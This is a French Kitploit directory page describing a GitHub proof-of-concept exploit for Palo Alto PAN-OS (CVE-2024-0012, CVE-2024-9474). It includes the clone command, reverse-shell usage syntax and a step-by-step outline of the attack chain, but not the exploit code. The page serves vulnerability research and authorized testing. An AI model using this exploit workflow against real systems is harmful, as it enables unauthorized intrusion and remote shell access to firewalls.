Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-0012_CVE-2024-9474_PoC — Cette preuve de concept (PoC) cible des vulnérabilités dans Palo Alto PAN-OS, plus précisément CVE-2024-0012 et CVE-2024-9474. Ce script automatise le processus d'exploitation, incluant la création de charges utiles, la livraison par fragments et l'exécution fluide de commandes. | Kitploit
Outils/GitHubGitHub/talatumlabs/cve-2024-0012_cve-2024-9474_poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubtalatumlabs/cve-2024-0012_cve-2024-9474_poc

CVE-2024-0012_CVE-2024-9474_PoC

Cette preuve de concept (PoC) cible des vulnérabilités dans Palo Alto PAN-OS, plus précisément CVE-2024-0012 et CVE-2024-9474. Ce script automatise le processus d'exploitation, incluant la création de charges utiles, la livraison par fragments et l'exécution fluide de commandes.

Voir le dépôt
852il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🚀 Exploit CVE-2024-0012 et CVE-2024-9474 (Palo Alto PAN-OS) 🔐

Palo Alto PAN-OS Exploit Type

🛡️ Description

Ce script de preuve de concept (PoC) cible les vulnérabilités de Palo Alto PAN-OS, spécifiquement CVE-2024-0012 et CVE-2024-9474 en automatisant le processus d'exploitation, y compris le contournement de l'authentification, la création de la charge utile, la livraison par fragments et l'exécution transparente de commandes.

⚠️ Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Toute utilisation non autorisée est illégale.


🔍 Vulnérabilités traitées

CVE-2024-0012

  • Type : Contournement de l'authentification
  • Impact : Permet un accès non autorisé aux interfaces d'administration.
  • Sévérité : 🚨 Critique

CVE-2024-9474

  • Type : Exécution de commandes et élévation de privilèges
  • Impact : Permet à des attaquants distants d'exécuter des commandes arbitraires.
  • Sévérité : 🔥 Moyenne

🧑‍💻 Utilisation

🛠️ Cloner le dépôt

git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC

🚀 Exécuter le script

python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Paramètres :

  • <TARGET_URL>: L'URL cible, incluant http ou https.
  • <LISTENER_IP>: Votre adresse IP pour l'écouteur de reverse shell.
  • <LISTENER_PORT>: Le port pour l'écouteur de reverse shell.

💡 Exemple

python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444

💻 Démo de l'exploit

https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5


⚙️ Comment ça fonctionne

Obtenez l'analyse complète et les informations techniques sur ce PoC à partir de cet article Medium !

  1. 🔍 Vérifie la vulnérabilité : S'assure que la cible est vulnérable à CVE-2024-0012 et CVE-2024-9474.
  2. 🛡️ Extrait le PHPSESSID : Récupère un ID de session pour une exploitation ultérieure.
  3. ✨ Génère la charge utile : Crée une charge utile de reverse shell doublement encodée.
  4. 📦 Télécharge les fragments : Envoie des fragments de la charge utile au serveur cible.
  5. 🔗 Combine la charge utile : Reconstruit la charge utile sur le système cible.
  6. ⚡ Exécute la commande : Décode et exécute le reverse shell.

⚠️ Avertissement légal

Ce PoC est destiné uniquement à des fins éducatives et tests de sécurité autorisés. Toute utilisation non autorisée de cet outil est strictement interdite. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.


🧑‍🎓 Auteur

ghostxploiter

Télécharger l’outil